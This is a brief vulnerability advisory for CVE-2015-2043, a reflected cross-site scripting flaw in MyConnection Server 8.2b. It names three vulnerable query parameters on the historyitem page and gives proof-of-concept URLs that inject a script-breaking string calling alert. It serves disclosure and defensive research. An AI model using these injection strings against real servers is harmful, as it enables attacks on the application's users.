Title: MyConnection Server 8.2b GET Reflected XSS Severity: High CVE-ID: CVE-2015-2043 Release Date: 23 February 2015 Author: Kenneth F. Belva Websites: http://silverbackventuresllc.com http://xssWarrior.com http://securitymaverick.com Twitter: @infosecmaverick Contact: Please use website contact form. Mail: URL: http://www.myconnectionserver.com/ Vendor: Remote Exploit: Yes Discovered with: xssWarrior - http://xssWarrior.com Description: ============ The application MyConnection Server 8.2b suffers from XSS vulnerabilities in three fields in the historyitem page. The three fields are: bt= variable= et= Proof of Concept : ================== http://vulnsite.com/myspeed/db/historyitem?bt="');+alert(10);+// http://vulnsite.com/myspeed/db/historyitem?variable="');+alert(10);+// http://vulnsite.com/myspeed/db/historyitem?et="');+alert(10);+//